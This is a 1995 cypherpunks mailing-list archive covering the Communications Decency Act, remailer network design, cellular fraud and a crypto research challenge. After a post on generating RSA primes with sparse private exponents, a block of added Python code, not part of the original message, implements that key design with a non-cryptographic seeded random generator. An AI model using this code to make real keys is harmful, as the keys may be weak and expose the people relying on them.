> sound a bit like is CDMA spread-spectrum, which lets a bunch of

Um no. The main thing is that what is extracted with the selection key is
_different_ from what was put in...


-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@mirage.skypoint.com (Samuel Kaplin)
Date: Wed, 8 Feb 95 22:05:41 PST
To: mlist-cypherpunks@nntp-server.caltech.edu
Subject: Re: S314 and potential hell-raising
In-Reply-To: <3hb6vd$2q4@gap.cco.caltech.edu>
Message-ID: <sDQElKjqRO9A078yn@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


In article <3hb6vd$2q4@gap.cco.caltech.edu>, you wrote:

> We simply MUST isolate this bill and, if it even comes close to sounding
> like what I think it does (ending the near-absolute freedom of expression
> and content across the Internet), we must fight it in every way possible,
> enlisting the ACLU, the EFF, and any other group potentially willing
> to pour money into a legal battle.

I just got a reply from Stanton M. from EFF today. To paraphrase, "No we're
not in favor of it and we're working on a response."

- --
==============================================================================
skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
Finger skaplin@mirage.skypoint.com for | "...vidi vici veni" - Overheard
PGP public key.                        | outside a Roman brothel.
                                       |
Fax Number  +1 (612) 928-9771          | An UZI beats five aces every time...
==============================================================================
         A pessimist sees "No parking." - An optimist sees "Anytime."

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joshua geller <alkahest!joshua@dee.retix.com>
Date: Wed, 8 Feb 95 23:23:08 PST
To: tcmay@netcom.com
Subject: Re: Da Judge-L FAQ -- We are not Amused
In-Reply-To: <199502090356.TAA04852@netcom10.netcom.com>
Message-ID: <199502090712.XAA14865@alkahest.isas.com>
MIME-Version: 1.0
Content-Type: text/plain



here come de judge:

>   The so-called Cypherpunks List, having been a party to this illegal
>   and "most heinous" distribution, is hereby invited to appear in our
>   Chambers on the morning of Tuesday, 29 February, 1995, at a place of
>   our choosing. Defense will be heard, and then the guilty will be
>   punished.

yes. a fair trial and a speedy execution.

josh










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joshua geller <alkahest!joshua@dee.retix.com>
Date: Wed, 8 Feb 95 23:21:56 PST
To: Jaeson.M.Engle@josaiah.sewanee.edu
Subject: Re: S314 and potential hell-raising
In-Reply-To: <v0151011cab5f38526c94@[152.97.12.101]>
Message-ID: <199502090715.XAA14870@alkahest.isas.com>
MIME-Version: 1.0
Content-Type: text/plain



>   >enlisting the ACLU, the EFF, and any other group potentially willing
>   >to pour money into a legal battle.

>   Fuck the EFF, they already lost their place in importance. The ACLU is 
>   a very good place to start however. Ideas??

there's room for another organization I think. there are, in my opinion,
two reasons why the NRA is as effective as it is: it has a single issue
that it concerns itself with and it never compromises.

so what, in very few words and as clearly as possible, is our issue?

josh







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@mirage.skypoint.com (Samuel Kaplin)
Date: Wed, 8 Feb 95 22:05:36 PST
To: cypherpunks@toad.com
Subject: Re: S314 and potential hell-raising
In-Reply-To: <v0151011cab5f38526c94@[152.97.12.101]>
Message-ID: <5QQElKjqRmxA078yn@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


In article <v0151011cab5f38526c94@[152.97.12.101]>, you wrote:
> >enlisting the ACLU, the EFF, and any other group potentially willing
> >to pour money into a legal battle.
>
>
> Fuck the EFF, they already lost their place in importance. The ACLU is a very good
> place to start however. Ideas??

There are going to be a lot of factions involved with this one. Some
desirable, some not. (I leave it up to the individual to make the
judgment) Maybe we can learn something from the military and apply c3
(Command, Control and Communications) to this. Set up a forum for
coordinating efforts, delegate tasks, most important communicate so we
don't waste resources on redundant efforts. The religious right has
successfully been doing this for years. Perhaps a dose of their own medicine
is in order. Anyone care to create a newsgroup? ;)


- --
==============================================================================
skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
Finger skaplin@mirage.skypoint.com for | "...vidi vici veni" - Overheard
PGP public key.                        | outside a Roman brothel.
                                       |
Fax Number  +1 (612) 928-9771          | An UZI beats five aces every time...
==============================================================================
                 Be careful when playing under the anvil tree.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ethridge@netcom.com (Allen B. Ethridge)
Date: Wed, 8 Feb 95 21:19:02 PST
To: cypherpunks@toad.com
Subject: Re: The drumbeat against anonymity continues....
Message-ID: <ab5f548601021004d020@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


Late night, off the top of my head, so no quotes, please.

Tim May wrote:
>
>
>The real "drumbeat" article is about cellular phone fraud and
>toll-free number fraud. Actually, a couple of related articles.
>(Everyone should at least skim "RISKS.")
>
>Anonymity is cited as a problem. But this misses the point, that the
>real problem is lack of a proper payment model. As David Chaum points
>out, there are really only two basic payment approaches: transfer of
>something of value or an account-based transfer. Cash or barter are
>examples of the first, checks or credit card payments are examples of
>the second (though each has some wrinkles). Digital cash, when online
>cleared, behaves mostly like real cash.
>
>The phone companies that are complaining about fraud have inadequately
>arranged for security and need to adopt a mode that fixes this. Since
>physical money can't be fed into the slots of a handheld cell phone (or
>at least can't then be delivered to the service owner!), the solution
>has traditionally been an account-based payment system. (Accounts can
>also be better protected against fraud by having PINs, etc.)
>

The technology to reduce cellular fraud, through encryption and
authentication, is easily implementable, but for some reason neither
the operating companies nor the manufacturers want it.

In contrast, European cellular (GSM) products do implement
encryption and authentication (at least as far as laws allow).
GSM mobile phones can be equipped with a slot for a card that
identifies the subscriber.  Billing is based on the subscriber's
identity, not the phone's.

I'd say that the problem isn't just a lack of a proper payment
model, but also an unwillingness to provide adequate technology
to the problem.  Of course, the GSM approach does nothing for anonymity
or digital cash.

allen@well.sf.ca.us          It's dangerous, child, to come to conclusions
ethridge@netcom.com          when you don't have any facts.
my opinions are my own       Dr. Hemlock, The Eiger Sanction






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@mirage.skypoint.com (Samuel Kaplin)
Date: Wed, 8 Feb 95 22:06:51 PST
To: "James A. Donald" <jamesd@netcom.com>
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <Pine.3.89.9502081135.A7848-0100000@netcom10>
Message-ID: <PiQElKjqRmN1078yn@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


In article <Pine.3.89.9502081135.A7848-0100000@netcom10>, you wrote:
> On Tue, 7 Feb 1995, Samuel Kaplin wrote:
> > I find it amazing that CPR and EFF
> > haven't picked this up yet.
>
> Really?

I had at least hoped that they would have their ear to the ground.
Unfortunately I was wrong. ;(


- --
==============================================================================
skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
Finger skaplin@mirage.skypoint.com for | "...vidi vici veni" - Overheard
PGP public key.                        | outside a Roman brothel.
                                       |
Fax Number  +1 (612) 928-9771          | An UZI beats five aces every time...
==============================================================================
  "A survey is being made of this":  We need more time to think of an answer.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: slowdog <slowdog@wookie.net>
Date: Wed, 8 Feb 95 21:08:42 PST
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <9502082149.AA28226@tis.com>
Message-ID: <Pine.LNX.3.91.950209000839.7928B-100000@chewy.wookie.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 8 Feb 1995, Carl Ellison wrote:

> >From: jpp@markv.com
> 
> >of the very most important rights.  To hold the owner of a bulletin
> >board responsible for the illegal messages posted to it, is to force
> >the bulletin board owner to become a government censor in all but name
> >(and wages).
> 
> anyone heard of "no unfunded mandates" ?

This is one of my favorite pet arguments in this case. With the no 
unfunded mandates notion in the air for the States, why can't sysops 
demand the same treatment, given the resources that would have to be 
devoted to tracking content on their systems.


- dog






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Wed, 8 Feb 95 22:17:25 PST
To: skaplin@mirage.skypoint.com (Samuel Kaplin)
Subject: Re: S314 and potential hell-raising
In-Reply-To: <sDQElKjqRO9A078yn@mirage.skypoint.com>
Message-ID: <199502090612.AAA03687@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


> 
> I just got a reply from Stanton M. from EFF today. To paraphrase, "No we're
> not in favor of it and we're working on a response."
>
What other kind of response other than no compromise should be entertained?

                                                Ravage
                                                 A
                                                  Konfused
                                                   Xfrmr
 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jaeson.M.Engle@josaiah.sewanee.edu (Rhys Kyraden)
Date: Wed, 8 Feb 95 22:35:05 PST
To: cypherpunks@toad.com
Subject: Re: S314 and potential hell-raising
Message-ID: <v01510134ab5f5a5a36be@[152.97.12.101]>
MIME-Version: 1.0
Content-Type: text/plain


>What other kind of response other than no compromise should be entertained?

Very much agreed. In this type of situation there is no room for compromise.
If we compromise, we lose, thus my earlier snippy comment about EFF. They
compromised and lost. We cannot do this now, we must win this or it starts
going downhill from here.

_____________________________________                  
{-: Jaeson M. Engle    ||    jme@josaiah.sewanee.edu :-}
{-:      www server: http://josaiah.sewanee.edu/         :-}
{-: Finger 'jme@josaiah.sewanee.edu' for my Public :-}
                                        PGP block.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: slowdog <slowdog@wookie.net>
Date: Wed, 8 Feb 95 22:30:35 PST
Subject: Re: S314 and potential hell-raising
In-Reply-To: <5QQElKjqRmxA078yn@mirage.skypoint.com>
Message-ID: <Pine.LNX.3.91.950209013119.8049A-100000@chewy.wookie.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 8 Feb 1995, Samuel Kaplin wrote:

> There are going to be a lot of factions involved with this one. Some
> desirable, some not. (I leave it up to the individual to make the
> judgment) Maybe we can learn something from the military and apply c3
> (Command, Control and Communications) to this. Set up a forum for
> coordinating efforts, delegate tasks, most important communicate so we
> don't waste resources on redundant efforts. The religious right has
> successfully been doing this for years. Perhaps a dose of their own medicine
> is in order. Anyone care to create a newsgroup? ;)

It's coming, soon. Keep your eyes peeled for an announcement.


- dog






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Network Security Observations <NSO@delphi.com>
Date: Wed, 8 Feb 95 23:38:21 PST
To: cypherpunks@toad.com
Subject: NSO Challenge 95 Nr. 1
Message-ID: <01HMTVLQZ2MW90GONH@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


***********************************
Network Security Observations
Challenge Nr. 1995-001
February 8, 1995
***********************************

Network Security Observations
invites the international research
community to produce a detailed
presentation on the following subject:

> Establishment, authentication, and
verification of a relationship and
untraceability of undeniable secret
transactions <


             Conditions
- Party A (Alice)
- Party B-n (Bob)
- A multitude of Bobs know who Alice is
- Alice - being only one party - does not
personally know who the Bobs are
- It is the desire of Alice to transact
- Bob - only producing a certain proof -
remains further a static party
- At one given time Alice established a
relationship with Bob-n
- Further, from time to time Alice wants
to check this relationship with Bob-n
- Alice may utilize the verification
process only for this purpose
- At a given point Alice might want to
terminate her relationship with Bob-n, or
vice versa

- It is essential that the relationship
between Alice and Bob-n is set up so that
Bob can prove to Alice that he is the
legitimate Bob, but, in such a way that
his real identity remains secret for Alice
- Alice can only use this procedure to
verify Bob's legitimacy
- Alice may only verify, but not register
- Alice may have the option to repeatedly
challenge Bob's legitimacy, but the
conditions under which these separate
verification checks take place may not be
registered as well
- Alice now wants that Bob can undeniably
prove to her that he is who he says he is,
by untraceable number verification, thus
without actually knowing the real identity
of Bob, and without the ability to utilize
the verification process for any other
purpose

The presentation should include the full
theoretical processes, applying known
cryptographic algorithms, the theories of
undeniable untraceable number verification
and secret transactions as developed by
Dr. David Chaum (see proceedings Crypto,
Eurocrypt, etc.), and envision a practical
applicability in a real world environment.

The presentations will be judged by a team
of seven international experts of senior
academic/research level.

The best presentation will receive
international acclaim (including, but not
limited to TV)  and a (secret)
financial reward of substance.

It is essential to register, (name,
surface mail address information,
affiliation, email address, p-pgp key
(optional)). One should do so by sending
an email message with this information to:
nso@delphi.com

Upon registration a notification and
detailed instructions will be mailed to
the individual who registers by surface
mail/airmail.

There is no limitation as to origin,
nationality, position, or seniority of the
researcher(s).

The presentation may be made by more than
one researcher, but a lead-researcher must
be registered. Co-researchers will share
equally in the benefits, allowing for one
extra share for the lead-researcher. 

There is no set maximum number of pages for
the presentation, though an extended abstract 
must be at least 15 pages, while the full paper
must be at least 25 pages in length.

The lead-researcher and at least two co-
researchers (if any) must be prepared to
present the efforts in person during an
international conference.

Commercial entities/companies may not participate.
Employees of commercial entities/companies may
participate individually, but must testify that their
employer shall have no benefit of their efforts.

To allow for proper preparation the
deadlines are as follows:

1. registration with NSO: ends on March 1,
1995.
2. proposed presentations (extended
abstracts) should be received by NSO on or
before August 31, 1995.
3. final presentations must be received by
NSO on or before November 30, 1995.

The presentation selection/review process
takes place in three rounds:
- first selection of the extended
abstracts
- correction selection of first round
passed
- final selection of remaining passed

More details will be available in the next
issue of Internet Security Monthly and the
next supplement of Network Security
Observations.

|    Network Security Observations  -  Internet Security Monthly
|    International Research Journals on 
|    Datacommunications and Network Security 
|    Suite 400, 1825 I Street NW, Washington DC 20006
|                                 United States 
|    Telephone +1 202 775 4947  -   Fax +1 202 429 9574 
|                  Internet:  nso@delphi.com   
                  ----------------------X----------------------








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Thu, 9 Feb 95 04:03:10 PST
To: cypherpunks@toad.com
Subject: Crusade's End
Message-ID: <Pine.3.89.9502090532.A21224-0100000@lia.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


Date: Wed Feb  1 20:35:31 1995
From: Rick Busdiecker <rfb@lehman.com>
 
        Date: Wed, 1 Feb 1995 18:59:54 -0600 (CST)
        From: Nathan Zook <nzook@bga.com>
    
        Instead of routing all of those messages to /dev/null, forward
        them back to the authors, perhaps with a notice that the message
        appears to have been mistakenly routed to you?
 
    And then all LD has to do to have lots-o-fun is to send you a whole
    bunch of "your OS sucks" messages with the From: line set to
    alt.religion.scientology@some.mail2news.site . . . .
 
    			Rick
 
Presumably, this sort of censure would occur very rapidly.  The script had
specific from/to lines it was looking for.  Neat idea, though.
 
Nathan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Thu, 9 Feb 95 04:03:49 PST
To: cypherpunks@toad.com
Subject: Lucky primes--third time's the charm?
Message-ID: <Pine.3.89.9502090512.B21224-0100000@lia.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
 
The algorithm I posted the second time works, (nice improvement, eh?) but
is likely to take several thousand years to complete.  And when it does, we
can expect weak primes.  The enhancement I propose should fix that.
 
 
As I recall, PGP uses 0x10001 for its e.  It does so in order to be able to
easily determine that e is a primitive root of unity in Fp.  Since we are
assuming that the p we actually work with is prime, we have: n^p = n mod p
ie: n^((p-1)*i+1) = n mod p.  So we want ed = (p-1)*i+1, ie: 
((ed-1)/i)+1 = p.
 
Let 2*x be the target number of bits in the modulus.  We then look for two
primes with approximately x digits such that d (for each prime in turn) is
small.  We know that ed = (p-1)*i+1, so we search for small i's that work.
d = ((p-1)*i+1)/e, so for a given p, d will be small iff i is small.
 
But in general, the calculation to invert e is long.  We therefore fix ed--
that is our n1--and hope for a small i that works.  If none work, we
increment d and try again.
 
Once we have a p that gives us a small d, we then count the 0's in d,
hoping for a high count.  If we don't get it, we increment d.
 
***
 
That is what my previous algorithm did.  Of course, we can expect a halt
exactly when d ends with a bunch of 0's, followed by a few spare bits.
B-A-D bad.
 
The solution, though, is easy: pick a random high-0 d.  Multiply it by
0x10001 to get ed, and search for small i's.  If you fail, increment d.
Doing so won't affect the number of 0's in d by much, and we expect a prime
fast enough that cumulatives won't be a problem, either.
 
***
Let 2*x be the target number of bits in the modulus.
GetPrime twice.
 
GetPrime:
Let d be a large random number with x-15 bits.
 
If d has too many 1's, pick digits at random and 0 them until d is
sufficiently 0-rich.  This would include room for extra 1s to appear as d
is incremented.
 
Let n1 = d * 0x10001
Let t2 be n1 mod 8, t3 be n1 mod 9, t5 be n1 mod 25, t7 be n1 mod 49.
 
Loop:
For i = 2 to 7
 If n1 = 1 mod i and (n1-1)/i + 1 is not a multiple of {2,3,5,7}
/* This can be done very fast, and eliminates most candidates. */
 
    If (n1-1)/i + 1  is prime, record and exit Loop.
/* This would be the long test in RSAREF, or Miller-Rabin. */
 
    EndIf
 EndIf
Next
d++
n1 += 0x10001
EndLoop
EndGetPrime
 
By keeping track of various quantities, we can eliminate all multiprecision
divisions except for the original one needed to get the t's and the first
n1/i's, and doing increments instead.
 
Nathan
 
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
 
-----END PGP SIGNATURE-----
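
The GetPrime procedure from the message above, written out as runnable Python. This is an added example, not code from the original post. The function names, the one-count cap `max_ones`, the seeded `random.Random` (chosen for repeatability, not as a key-grade generator), Miller-Rabin as the "long test", and the CRT round-trip check are assumptions.

```python
import random

E = 0x10001  # public exponent named in the post


def is_probable_prime(n, rng, rounds=24):
    """Miller-Rabin; stands in for the post's 'long test'."""
    if n < 2:
        return False
    for sp in (2, 3, 5, 7, 11, 13):
        if n % sp == 0:
            return n == sp
    s, t = 0, n - 1
    while t % 2 == 0:
        s, t = s + 1, t // 2
    for _ in range(rounds):
        y = pow(rng.randrange(2, n - 1), t, n)
        if y in (1, n - 1):
            continue
        for _ in range(s - 1):
            y = pow(y, 2, n)
            if y == n - 1:
                break
        else:
            return False
    return True


def sparse_exponent(bits, max_ones, rng):
    """Random d of exactly `bits` bits; set bits are cleared at random
    until at most `max_ones` remain ('0-rich' in the post's words)."""
    d = rng.getrandbits(bits) | (1 << (bits - 1))
    set_bits = [b for b in range(bits - 1) if (d >> b) & 1]
    rng.shuffle(set_bits)
    while bin(d).count("1") > max_ones and set_bits:
        d &= ~(1 << set_bits.pop())
    return d


def get_prime(x, max_ones, rng):
    """Search for a prime p of about x bits with E*d = (p-1)*i + 1.

    Returns (p, d, i, steps), where steps counts how often d was
    incremented after the initial sparse choice."""
    d = sparse_exponent(x - 15, max_ones, rng)
    n1 = d * E
    steps = 0
    while True:
        for i in range(2, 8):
            if n1 % i != 1:
                continue
            p = (n1 - 1) // i + 1
            # Cheap filter first: drop multiples of 2, 3, 5, 7.
            if any(p % sp == 0 for sp in (2, 3, 5, 7)):
                continue
            if is_probable_prime(p, rng):
                return p, d, i, steps
        d += 1
        n1 += E
        steps += 1


def crt_decrypt(c, p, dp, q, dq):
    """RSA decryption with one exponent per prime (Garner's recombination)."""
    mp, mq = pow(c, dp, p), pow(c, dq, q)
    h = (pow(q, -1, p) * (mp - mq)) % p
    return mq + h * q


def demo(x=256, max_ones=24, seed=1995):
    rng = random.Random(seed)
    P = get_prime(x, max_ones, rng)
    Q = get_prime(x, max_ones, rng)
    m = int.from_bytes(b"constructed test message", "big")
    c = pow(m, E, P[0] * Q[0])
    ok = crt_decrypt(c, P[0], P[1], Q[0], Q[1]) == m
    return {"P": P, "Q": Q, "roundtrip": ok}


if __name__ == "__main__":
    r = demo()
    for name in ("P", "Q"):
        p, d, i, steps = r[name]
        print(name, "bits:", p.bit_length(), "i:", i,
              "ones in d:", bin(d).count("1"), "increments:", steps)
    print("CRT round trip ok:", r["roundtrip"])
```

Each call yields its own d, so the two exponents act as per-prime (CRT) exponents; the round trip shows that decryption works with them even though no single shared d is constructed.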





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Thu, 9 Feb 95 04:03:10 PST
To: cypherpunks@toad.com
Subject: Frothing remailers - an immodest proposal
Message-ID: <Pine.3.89.9502090523.D21224-0100000@lia.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


 
kevin@elvis.wicat.com:
 
>Be gentle, though - it's my first time.
 
Here?  You jest.  ;)
 
>It seems to me that the current remailer web suffers a fundamental flaw.
>It is simply too static. When a remailer disappears, service is
>disrupted and messages are lost. Humans have to statically route their
>messages through the web either by hand or using relatively primitive
>tools such as the chain script (not to belittle the useful work that has
>been done, but it is by no means idiot proof yet). Basically, the
>current web of mailers shows nothing of the dynamic nature that has kept
>the internet alive and has offered us a decent chance at truly anonymous
>communications, nor is it easy to use to its full potential.
>
>Consider a more dynamic web of remailers. I envision remailers that
>actively advertise their presence on the web so that all active
>remailers are aware of all other active remailers. This advertising is
>to have very low latency so that a new mailer can be known to the web
>within minutes (I will address the implementation of this later). Thus,
>remailers can constantly be appearing and disappearing without impact on
>the web as a whole (I refer to this dynamic web of remailers as a
>"froth"). Imagine also that remailers are allowed to dynamically perform
>the routing functions that are currently done statically offline (for
>reasons I will discuss shortly).
>
 
Some version of this discussion came up a few months ago, and I passed on
it then, but I think I've heard enough to comment now:
 
The remailers are based on an inherently different model than the InterNet.
Some of these differences, in fact, are crucial.
 
1) The InterNet is based on mutual cooperation/mutual trust.  Cypherpunks
   trust no one that they don't have to.
 
This is not just a result of our twisted psyche.  If we could trust
everyone, we wouldn't _need_ remailers.  Since we don't even know who is
whom out there, we avoid extending trust.
 
2) The InterNet is concerned first about reliability, and not at all about
   privacy.  The remailers are concerned first about privacy, and can leave
   reliability to the users, if need be.
 
There is nothing to prevent Alice and Bob agreeing to send each other ACK
statements, and retransmitting messages if they don't get the ACK.  There
has been some mention of remailers doing the same with each other, in an
attempt to improve net-wide reliability.  BTW, with T1, sending ACKs is not
unreasonable between remailers.
 
3)  From 1) and 2).  The remailers are heading towards mandatory PGP,
    possibly nested.  All InterNet messages are world-readable--although
    this may be changing as the model breaks down.
 
Again, this has to do with the intrinsic differences.
 
>The use of such transient routers implies allowing dynamic routing. If
>any given remailer may go down or move at any point, it is impractical
>to expect users to keep track of which are up at the moment and create
>static routes in the current manner. The only reasonable solution I have
>come up with is to allow the remailers themselves to choose routing,
>given that they have full knowledge of the current state of the froth.
 
Here we have the real head of the problem, as Hal so astutely points out:
in your model, if the first remailer is bad, the message is compromised.
If users encrypt to all remailers, they might as well encrypt directly to
mole@snakeoil.nsa.gov.  If they don't, they severely limit who can pick out
their messages.  In particular, they bypass transient remailers.
 
But that isn't all.  If the remailers pick the route, they are in a no
better state than the users.  Since the flushing attack requires remailers
to operate on ticks, with carryover, an hour delay per remailer is almost
minimal, until traffic really picks up.  So if some message routes through
four remailers, a minimum of four hour delay results.  In your case, this
could easily move between in/out of service modes.
 
 
>                 Think about the proposed extension to MixMaster to
>allow separate parts of a multi-part message to be routed separately,
>and consider whether you really want to have to do this by hand. I
>strongly suspect that most messages are currently routed via boilerplate
>scripts, which has to make the job of traffic analysis much easier for
>our good friend Eve.
 
Stupid is as stupid does.
 
 
>By the way, a brief rant on a related topic; people speak of not
>trusting remailers any further than necessary, while I am clearly
>suggesting granting more authority and trust to the remailers. This
>notion of not assigning trust is simply nonsense. When you send a piece
>of mail to a remailer, encrypted or not, you are assigning complete
>trust in that remailer to keep you anonymous and not to forward your
>mail to the NSA immediately.
 
NOT TRUE.  With proper use of encryption, you are trusting your first
remailer only to not reveal that you sent a message, and not to correlate
that message to the one it sends out.  With rational use of garbage running
two deep, you can even suffer this loss without significant harm.
 
 
>This does lead to a related problem, however; if we allow remailers to
>pop up at random and join in the froth, how do we know that Detweiler
>won't set up a number of black hole remailers that take your mail and
>throw it away, disrupting the froth, or forward it to nphard@nsa.gov?
 
How indeed?  The reason we chain is because we _don't_ really trust our
first remailer--or any other.
 
>Fortunately, we already have the PGP web of trust model in place and can
>use it to good effect in this case. Remailers should simply not route
>mail through any remailer whose public key is not trusted unless
>explicitly ordered otherwise. This requires remailer operators to
>cooperate to some extent to validate one another's remailer keys, but
>does confer the great advantage of portable remailers as mentioned
>above; if I run a trusted remailer on one machine, I can move it to
>another machine, and as soon as I advertise the new address and the PGP
>public key, it is a trusted and useful part of the froth.
 
Actually, there may be something here.  I don't know about you all, but my
PGP isn't very happy about all these new remailer keys.  We could agree to
the following standard:  Signing a remailer's key means that you believe
the remailer to be secure.  Trusting a remailer key means trusting the
remailer operator to validate other remailers' security.  This adds a whole
new meaning to the phrase, "key compromise certificate".
 
 
>While we are advertising a PGP key and internet address, we might as
>well incorporate other useful information. For instance, remailers could
>advertise their maximum latency. 
 
While I agree that it is useful to post the operating characteristics of
the remailers, the maximum latency must theoretically be infinite in the
standard model to prevent flushing attacks.
 
>    Kevin
 
 
 
Hal <hfinney@shell.portal.com>:
 
 
>I do like Kevin's ideas about a dynamic remailer net, but I think
>another approach would put more smarts into the client program used by
>the originator.  
 
Hear ye, hear ye!  And along those lines...
 
I'm sketchy (at best) on what is meant by "pinging" a remailer.  Would it
not be possible for live-on-the-net remailers to accept a (socket?) quick
check to see if they are online?  If so, then the ping would only work if
the remailer was active when tried.  Furthermore, client software could
startup by sending out these pings, and presenting only responding
remailers to the user--with an exception list for those not "live".
 
Nathan

P.S.:  Late breaking weakness:
Pinging a group of remailers is strong evidence that you are about to 
send a message.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Thu, 9 Feb 95 04:03:19 PST
To: cypherpunks@toad.com
Subject: re: Remailer Encryption Module
Message-ID: <Pine.3.89.9502090612.E21224-0100000@lia.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


   From: eric@remailer.net (Eric Hughes)
      From: Nathan Zook <nzook@bga.com>
 
      I also believe that hacking PGP is a bad thing (tm), because it means
      that every time an upgrade comes out, it will need to be re-hacked, and
      once you start hacking, when do you stop?
 
   I agree.  PGP just does not have the support for the encryption
   required for mixing remailers.  These deficiencies have been known for
   about two years at this point and still nothing has happened.  I
   expect this not to change anytime soon.
 
   That means that we have to replace PGP as the encryption module for
   remailers.  The first thing to do is to design a data format which
   supports what the remailers need now, and nothing speculative.  Since
   this data format has a single purpose, we can make new revisions more
   easily than for a general purpose package.
 
   Once we get a data format, implementations will follow.
 
   Eric
 
As I've considered this problem, I've arrived at essentially the same
conclusion.  We need an RSA-IDEA package that does something very close to
Mixmaster.  The only caveat is that we _must_ retain compatibility between
signature formats, even though, as I've suggested, a signature on a
remailer's key might mean something different than a signature on an
individual key.
 
Nathan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Thu, 9 Feb 95 04:03:20 PST
To: cypherpunks@toad.com
Subject: IQ & such
Message-ID: <Pine.3.89.9502090646.F21224-0100000@lia.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


For what it's worth, I have a tested IQ of 151.  While I am capable of
being trained to perform certain feats quite rapidly via methods that
"average" people don't understand, this is a far cry from the 30-point
never-can-be-explained claim made earlier.  There is one task that I have
observed an intuitive bonus on, but I have _never_ been unable to explain
the methods used to anyone that expressed interest.
 
I once multiplied two 45 (decimal) digit numbers with no intermediate work
on a challenge.  I claim that my methods could be explained with no trouble
to almost anyone who can multiply two two-digit numbers--I believe that they
are essentially the standard ones for multiprecision multiplication.
 
Nathan
 
A reasoning machine, in the shape of a man, but with no conscious, is not
truly human.
--paraphrase from a letter to the Editor in a Mensa publication





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Thu, 9 Feb 95 04:05:18 PST
To: cypherpunks@toad.com
Subject: Re:  Why encrypt intra-remailernet.
Message-ID: <Pine.3.89.9502090621.G21224-0100000@lia.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
 
I was finally able to read Lance's stuff.  Great work!  Ironically, I
arrived at the conclusion that his methods are necessary just before
downloading my mail (including his stuff).  With that in mind, I have now a
new DRAFT:  model.  I anticipate continued discussions on these matters
mostly under that topic.  Also, could you send me a copy of Chaum's paper?
I don't have metamail, but I can convert GIFs, if you could send it PGP -a.
Thanks!!!!!!!
 
 
> From: Nathan Zook <nzook@bga.com>
> [ Re: remailers checking signatures on incoming messages ]
> > What benefit does Alice gain?
> > 1) Plausible deniability.  Remember, "reasonable doubt."  Remember Abscam?
> >    The gov't is in a good position to fake source info.  This squishes
> >    that.  (It squishes even better if Chaum _requires_ signatures.)
> 
> She doesn't get that.  A signature lets her prove that she sent a
> message.  It doesn't let her prove she didn't send a message.
> 
 
If Chaum only accepts validly signed packets, she can.  (Or at a minimum,
the government must demonstrate that she compromised these other keys.)
 
 
> > 2) If Chaum sends Alice a copy of the message that failed the signature
> >    check, Alice knows that someone is trying to spoof her.  This
> >    information may be critical in determining how serious her opponents
> >    are.
> 
> I don't really understand this threat that Alice may be "spoofed".  Why,
> of all places, would her opponents try to spoof her through an anonymous
> remailer?  Isn't this kind of like sending mail with no return address,
> and pretending it comes from someone else?  This seems terribly subtle.
> 
 
It's called "faking evidence".  It's a real problem, especially if you are a
